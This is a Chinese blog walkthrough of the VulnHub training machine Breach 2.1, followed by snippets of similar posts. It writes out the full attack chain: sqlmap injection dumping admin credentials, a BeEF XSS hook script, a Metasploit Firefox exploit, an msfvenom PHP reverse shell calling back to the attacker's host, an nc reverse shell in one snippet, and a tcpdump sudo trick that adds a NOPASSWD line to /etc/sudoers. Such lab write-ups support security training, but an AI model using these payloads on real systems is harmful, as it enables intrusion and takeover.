Breach 2.1

于 2024-09-23 20:36:33 发布
阅读量739 收藏 14
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hubhubb/article/details/142468005
版权

扫描ip

扫描端口

现在能利用的好像只有ssh服务,尝试访问ssh服务

发现了用户Peter以及密码inthesource

ssh peter@192.168.110.151 -p 65535

链接中断

再次扫描端口

开启了80端口

访问网页

扫描后台

尝试在搜索框进行sql注入

依次查看各数据库,发现在oscommerce数据库存在账号密码

sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce --tables --batch

sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce -T osc_administrators --columns --batch

sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce -T osc_administrators -C user_name,user_password --dump --batch

得到一组新的账号密码admin 685cef95aa31989f2edae5e055ffd2c9解密得到32admin

来到注册页面,注册成功后点击Members,弹出弹框,说明此处存在XSS漏洞

apt install beef-xss
beef-xss

将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址(192.168.110.128)

<script src="http://192.168.110.128:3000/hook.js"></script>
123456
123456@qq.com

点击Register——再点击页面上的Members,之后可以看到靶机已上线,发现火狐浏览器版本为15存在漏洞

http://127.0.0.1:3000/ui/panel

发现火狐浏览器版本为15存在漏洞

因为靶机用的是火狐浏览器,所以选用火狐模块攻击

msfconsole
use exploit/multi/browser/firefox_proto_crmfrequest
set payload generic/shell_reverse_tcp
set srvhost 192.168.110.128
set uripath shell
set lhost 192.168.110.128
run

在beef中调用iframe进行利用

发现每隔5秒会话会自动中断,需要迅速切换反弹shell为meterpreter

    use post/multi/manage/shell_to_meterpreter
    set session 1
    run

    sessions
    sessions 2
    shell
    python -c 'import pty; pty.spawn("/bin/bash")'

因为刚刚peter连接SSH时被踢出来了,所以先看看SSH的配置文件,发现在文件尾写到登入peter时会运行/usr/bin/startme

查看对应文件内容,startme的作用是开启apache服务, 所以登录成功peter才开放80端口

cd /home
ls -la

检查网络状态

netstat -tln

使用telnet连接端口,提示一个坐标位置29°45'46.0"N 95°22'59.0"W,基于坐标进行地图(map.google.com)查询发现为休斯顿的地址位置,使用账号milton登录,密码Houston尝试登录

telnet 127.0.0.1 2323

find /usr -user milton
cat /usr/local/bin/cd.py

再次查看网络信息,提示8888端口已经放开

访问8888端口

使用dirsearch对其进行目录扫描

dirsearch -u http://192.168.110.151:8888/oscommerce/

拼接/admin/,出现了一个登录框

尝试弱口令进行登录admin admin,发现登录成功

存在可利用的点,在Tools发现了一个文件管理器

在include/work路径下上传木马,使用MSF生成反弹shell木马,并上传到服务器中

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=9999 -f raw -o shell.php

kali开启一个服务,将生成的shell.php下载到本地再上传到服务器中

MSF设置监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.110.128
set lport 9999
run

访问木马路径文件,反弹成功

http://192.168.110.151:9999/oscommerce/includes/work/shell.php

获取交互式shell,发现此时用户为blumbergh,依旧是低权限

shell
python -c "import pty;pty.spawn('/bin/bash')"

sudo -l #查看可运行的sudo命令

tcpdump | GTFOBins

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

切换到 tmp 目录,构造1.sh 脚本文件以实现提权,然后执行GTOFbins中给出的 sudo 命令,实现脚本利用

cd /tmp
echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/test && chmod +x /tmp/test
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test -Z root
sudo su

hubhubb
关注
breach靶机
Encild的博客
11-09 429
[2021 11 7] breach靶机端口扫描GetShell 目录 breach靶机 端口扫描 GetShell breach靶机 端口扫描 已知IP为192.168.110.140 直接扫描端口: sudo nmap -sF -p1-65535 192.168.110.140 访问80端口: 翻译: Initech 遭到破坏,董事会投票决定引入其内部的 Initech Cyber•• Consulting LLP 部门...
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3646
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
Breach 2.1靶机
m0_61995767的博客
08-02 2092
Breach 2.1打靶记录
VulnHub靶场笔记 - Breach: 2.1(OSCP推荐靶场)
m0_62652276的博客
12-31 1307
根据此前的提示,我们尝试使用beef-xss工具(密码igfix),我们将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址。sshd_config是客户端的ssh配置文件,查看内容,在配置文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。综合之前的思路,既然peter用户的密码是知道的但无法正常进行ssh登录,我们尝试查找与ssh相关的配置。
Breach-2.1靶机
最新发布
m0_65285254的博客
08-02 443
sshd_config是客户端的ssh配置文件,在文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。提交成功之后访问http://192.168.110.151/blog/members.html 即可触发漏洞。在配置文件中发现,mysql数据库的root用户并没有设置密码,所以我们可以直接登录数据库后台。开放端口三个,分别是111,40653,65535三个端口 没有80端口。查看/home/milton目录下的文件 发现 .profile 文件。
Breach-2.1
weixin_44770698的博客
03-10 768
靶场练习-60
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
解密HTTPS流量并getshell和提权系统权限(Breach1.0)
曹振国的博客
07-28 1302
文章目录一、靶场的搭建及环境配置1.1 靶场介绍1.2 环境配置二、信息收集发现目标2.1 nmap扫描端口探测2.2 访问80端口(Web服务)2.3 访问跳转地址,并保存相关信息三、查看首页源码并解码得到密码3.1 回到首页,查看页面源码,3.2 解码得到账号,密码四、登录CMS通过邮件下载SSL证书的密钥库文件4.1 登录CMS4.2 下载wireshark流量包文件4.3 查看邮件找到SSL证书密钥库文件4.4 通过kali寻找该CMS的漏洞五、导入流量抓包文件、SSL证书到Wireshark5.1
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3173
每台都做一做,然后记录在博客里.供自己和大家一起学习.
【vulnhub】---Breach-1.0靶机
qq_43168364的博客
08-22 1182
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Breach-1.0靶机(192.168.110.140) 攻击机:kali Linux(192.168.15.129) 物理机IP:192.168.110.220 相关配置 由于该靶机用的是静态的ip,我们要访问的话需要改变主机的IP和他处于同一个网端,为了让物理机还可以访问互联网,我们给物理机添加上两个网卡 这样就OK了 二、信息收集 主机发现 该靶机已知IP地址无需主机发现 端
vlunhub系列之breach靶机
hanjinming110的博客
08-11 477
cat shell.txt nc -e /bin/bash 192.168.110.22 5555 将其成功的写入到这个文件中,我们使用/usr/bin/tee目录,将这个文件写入到/usr/share/cleanup/tiduup.sh中。cat /usr/share/cleanup/tidyup.sh nc -e /bin/bash 192.168.110.22 5555 成功的将脚本写入到找个文件中,等待可执行脚本的运行。
(vulnhub靶机通关)Breach系列:breach-1.0
yang1234567898的博客
01-22 4361
靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 根据作者描述,靶机配置了一个静态IP地址(192.168.110.140),需要仅主机适配器配置此子网 配置仅主机网卡为DHCP,子网地址192.168.110.0 注意:类型为仅主机的网卡才可以 VMware适配器改成以下地址 靶机和kali网络选仅主机模式 确实环境是否配置好 环境搞好,直接开干! 信息收集 扫端口 扫描.
vulnhub靶机渗透 Breach 1
RestoreJustice的博客
03-18 178
Tomcat后台get shell是有标准姿势的,使用哥斯拉生成jsp马,将其打成shell.zip压缩包,再将zip压缩包将扩展名改为shell.war,将war包上传部署即可.发现的问题:上传的webshell,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用,主机可能有杀软或者杀web shell工具。将图片复制到kali linux,使用strings打印各图片其中的可打印字符,追加输出到images.txt,在vim下查看,密码在bill.png图片中。这里连接到虚拟网卡1。
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 1482
Vulnhub靶场Breach1.0详解
Breach 2.0
曹振国的博客
08-03 1220
文章目录一、靶场环境配置二、对目标进行信息收集1.nmap端口探测2.连接ssh服务3.扫描目录4.sql注入找到管理员的账号密码5.通过关键字,漏洞库搜索payload三、使用beef+msfconsole拿shell1.使用beef进行xss攻击2.使用msf生成对应的exp3.使用beef+msf将浏览器链接进行重定向4.将shell转义到msfconsole5.利用python调用本地shell实现交互式命令行四、后渗透1.查看ssh配置文件2.查看所开启的端口3.查看passwd文件里的用户名和密
模拟 hacker 攻破 breach靶机详细全流程
weixin_74091677的博客
05-11 937
如果你完整的看完了整篇流程 你可以发现 信息收集对我们渗透一个机器 非常重要 我的老师跟我说 渗透的本质是信息收集 如果你想要更好的提升你的渗透能力 信息收集是非常重要的能力 那些你没有收集到的信息 往往是渗透进入机器的关键 多尝试 多碰撞本人菜鸟一枚 也是跟着老师的步骤做的流程 加上自己的一些理解和总结(相当于我的笔记) 希望对你在练习breach靶机的时候有帮助。
靶机实战-Breach-1.0
滕财然的博客
03-25 2556
Breach-1.0靶机实战 文章目录Breach-1.0靶机实战1、主机发现2、端口扫描3、web服务(80端口)4、提权5、总结 1、主机发现 没有IP的话自行配置IP 2、端口扫描 发现开放了N多端口,可能做了端口防护,那直接尝试访问80端口 3、web服务(80端口) 查看页面源码: 发现疑似base64加密的字符串 尝试解密: 发现解出来又是个base64,继续解密,最后解密出...
一次失败的vulnhub靶机渗透之breach1.0
weixin_44255856的博客
08-06 1465
靶机地址下载https://pan.baidu.com/s/1KuwK_8MqCWhcIcNpTJ-OLQ 这是靶机的介绍 在一个由多个部分组成的系列文章中,Breach 1.0是一个初学者到中级boot2root/CTF挑战。解决问题需要扎实的信息收集和坚持不懈的努力。千方百计。 VM配置了一个静态IP地址(192.168.110.140),因此您需要将您的主机专用适配器配置到这个子网。 非常...
kali渗透综合靶机(十五)--Breach-1.0靶机
W小哥
04-01 2313
一、靶机下载 下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip 二、Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为ho...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值